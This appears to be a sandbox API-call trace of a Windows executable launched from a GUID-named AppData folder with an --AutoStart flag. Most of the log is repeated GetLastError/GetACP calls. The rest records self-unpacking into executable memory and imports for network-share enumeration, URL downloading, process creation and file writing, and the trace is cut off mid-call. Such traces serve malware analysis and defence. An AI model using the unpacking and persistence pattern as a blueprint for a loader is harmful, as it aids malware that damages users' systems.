S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0xaec Process: id = "7" image_name = "ythgrfed.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\ythgrfed.exe.exe" page_root = "0x151e1000" os_pid = "0x53c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x488" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb57" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0x540 [0172.275] GetLastError () returned 0x0 [0172.275] GetACP () returned 0x4e4 [0172.275] GetLastError () returned 0x0 [0172.275] GetACP () returned 0x4e4 [0172.275] GetLastError () returned 0x0 [0172.275] GetACP () returned 0x4e4 [0172.275] GetLastError () returned 0x0 [0172.275] GetACP () returned 0x4e4 [0172.275] GetLastError () returned 0x0 [0172.275] GetACP () returned 0x4e4 [0172.275] GetLastError () returned 0x0 [0172.275] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.276] GetLastError () returned 0x0 [0172.276] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.277] GetLastError () returned 0x0 [0172.277] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.278] GetLastError () returned 0x0 [0172.278] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.279] GetLastError () returned 0x0 [0172.279] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.280] GetLastError () returned 0x0 [0172.280] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.281] GetLastError () returned 0x0 [0172.281] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.282] GetLastError () returned 0x0 [0172.282] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.283] GetLastError () returned 0x0 [0172.283] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.284] GetLastError () returned 0x0 [0172.284] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.285] GetLastError () returned 0x0 [0172.285] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.286] GetACP () returned 0x4e4 [0172.286] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.287] GetLastError () returned 0x0 [0172.287] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.288] GetLastError () returned 0x0 [0172.288] GetACP () returned 0x4e4 [0172.755] LocalAlloc (uFlags=0x0, uBytes=0x90e9d) returned 0x300020 [0174.054] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77010000 [0174.066] GetProcAddress (hModule=0x77010000, lpProcName="VirtualProtect") returned 0x7702435f [0174.066] VirtualProtect (in: lpAddress=0x300020, dwSize=0x90e9d, flNewProtect=0x40, lpflOldProtect=0x18f744 | out: lpflOldProtect=0x18f744*=0x4) returned 1 [0174.122] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77010000 [0174.122] GetProcAddress (hModule=0x77010000, lpProcName="GlobalAlloc") returned 0x7702588e [0174.123] GetProcAddress (hModule=0x77010000, lpProcName="GetLastError") returned 0x770211c0 [0174.123] GetProcAddress (hModule=0x77010000, lpProcName="Sleep") returned 0x770210ff [0174.123] GetProcAddress (hModule=0x77010000, lpProcName="VirtualAlloc") returned 0x77021856 [0174.123] GetProcAddress (hModule=0x77010000, lpProcName="CreateToolhelp32Snapshot") returned 0x7704735f [0174.123] GetProcAddress (hModule=0x77010000, lpProcName="Module32First") returned 0x770a5cd9 [0174.123] GetProcAddress (hModule=0x77010000, lpProcName="CloseHandle") returned 0x77021410 [0174.123] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0174.127] Module32First (hSnapshot=0x44, lpme=0x18f4d0) returned 1 [0174.130] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x720000 [0174.212] GetProcAddress (hModule=0x77010000, lpProcName="LoadLibraryA") returned 0x770249d7 [0174.212] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77010000 [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="VirtualAlloc") returned 0x77021856 [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="VirtualProtect") returned 0x7702435f [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="VirtualFree") returned 0x7702186e [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="GetVersionExA") returned 0x77023519 [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="TerminateProcess") returned 0x7703d802 [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="ExitProcess") returned 0x77027a10 [0174.213] GetProcAddress (hModule=0x77010000, lpProcName="SetErrorMode") returned 0x77021b00 [0174.213] SetErrorMode (uMode=0x400) returned 0x0 [0174.213] SetErrorMode (uMode=0x0) returned 0x400 [0174.214] GetVersionExA (in: lpVersionInformation=0x18e400*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}`w") | out: lpVersionInformation=0x18e400*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.214] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x890000 [0174.239] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f488 | out: lpflOldProtect=0x18f488*=0x2) returned 1 [0174.909] VirtualFree (lpAddress=0x890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.916] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76570000 [0174.916] GetProcAddress (hModule=0x76570000, lpProcName="RpcStringFreeW") returned 0x76591635 [0174.916] GetProcAddress (hModule=0x76570000, lpProcName="UuidCreate") returned 0x7658f48b [0174.916] GetProcAddress (hModule=0x76570000, lpProcName="UuidToStringW") returned 0x765b1ee5 [0174.916] GetProcAddress (hModule=0x76570000, lpProcName="RpcStringFreeA") returned 0x765b3fc5 [0174.916] GetProcAddress (hModule=0x76570000, lpProcName="UuidToStringA") returned 0x765ed918 [0174.917] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x750f0000 [0174.976] GetProcAddress (hModule=0x750f0000, lpProcName="WNetOpenEnumW") returned 0x750f2f06 [0174.976] GetProcAddress (hModule=0x750f0000, lpProcName="WNetEnumResourceW") returned 0x750f3058 [0174.976] GetProcAddress (hModule=0x750f0000, lpProcName="WNetCloseEnum") returned 0x750f2dd6 [0174.977] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x751d0000 [0175.032] GetProcAddress (hModule=0x751d0000, lpProcName="InternetCloseHandle") returned 0x751eab49 [0175.032] GetProcAddress (hModule=0x751d0000, lpProcName="InternetReadFile") returned 0x751eb406 [0175.032] GetProcAddress (hModule=0x751d0000, lpProcName="InternetOpenUrlW") returned 0x7524be5c [0175.032] GetProcAddress (hModule=0x751d0000, lpProcName="InternetOpenW") returned 0x751f9197 [0175.032] GetProcAddress (hModule=0x751d0000, lpProcName="HttpQueryInfoW") returned 0x751f5c75 [0175.032] GetProcAddress (hModule=0x751d0000, lpProcName="InternetOpenA") returned 0x751ff18e [0175.033] GetProcAddress (hModule=0x751d0000, lpProcName="InternetOpenUrlA") returned 0x752130f1 [0175.033] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x750b0000 [0175.049] GetProcAddress (hModule=0x750b0000, lpProcName="timeGetTime") returned 0x750b26e0 [0175.049] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76c20000 [0175.049] GetProcAddress (hModule=0x76c20000, lpProcName="PathAppendA") returned 0x76c2d65e [0175.049] GetProcAddress (hModule=0x76c20000, lpProcName="PathFindFileNameW") returned 0x76c3bb71 [0175.049] GetProcAddress (hModule=0x76c20000, lpProcName="PathRemoveFileSpecW") returned 0x76c33248 [0175.049] GetProcAddress (hModule=0x76c20000, lpProcName="PathFileExistsA") returned 0x76c5ad1a [0175.050] GetProcAddress (hModule=0x76c20000, lpProcName="PathFileExistsW") returned 0x76c345bf [0175.050] GetProcAddress (hModule=0x76c20000, lpProcName="PathAppendW") returned 0x76c381ef [0175.050] GetProcAddress (hModule=0x76c20000, lpProcName="PathFindExtensionW") returned 0x76c3a1b9 [0175.050] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x77010000 [0175.050] GetProcAddress (hModule=0x77010000, lpProcName="VirtualFree") returned 0x7702186e [0175.050] GetProcAddress (hModule=0x77010000, lpProcName="WriteFile") returned 0x77021282 [0175.050] GetProcAddress (hModule=0x77010000, lpProcName="GetDriveTypeA") returned 0x7703ef75 [0175.050] GetProcAddress (hModule=0x77010000, lpProcName="OpenProcess") returned 0x77021986 [0175.050] GetProcAddress (hModule=0x77010000, lpProcName="GlobalAlloc") returned 0x7702588e [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="GetSystemDirectoryW") returned 0x77025063 [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="WideCharToMultiByte") returned 0x7702170d [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="LoadLibraryW") returned 0x7702492b [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="Sleep") returned 0x770210ff [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="CopyFileW") returned 0x7704830d [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="FormatMessageW") returned 0x77024620 [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="lstrcpynW") returned 0x7704d556 [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="CreateProcessA") returned 0x77021072 [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="TerminateProcess") returned 0x7703d802 [0175.051] GetProcAddress (hModule=0x77010000, lpProcName="ReadFile") returned 0x77023ed3 [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="CreateFileW") returned 0x77023f5c [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="lstrcatA") returned 0x77042b7a [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="GetEnvironmentVariableA") returned 0x770233a0 [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="lstrcmpW") returned 0x77025929 [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="MultiByteToWideChar") returned 0x7702192e [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="lstrlenW") returned 0x77021700 [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="FlushFileBuffers") returned 0x7702469b [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="GetShortPathNameA") returned 0x7704594d [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="GetFileSizeEx") returned 0x770259e2 [0175.052] GetProcAddress (hModule=0x77010000, lpProcName="GetLastError") returned 0x770211c0 [0175.053] GetProcAddress 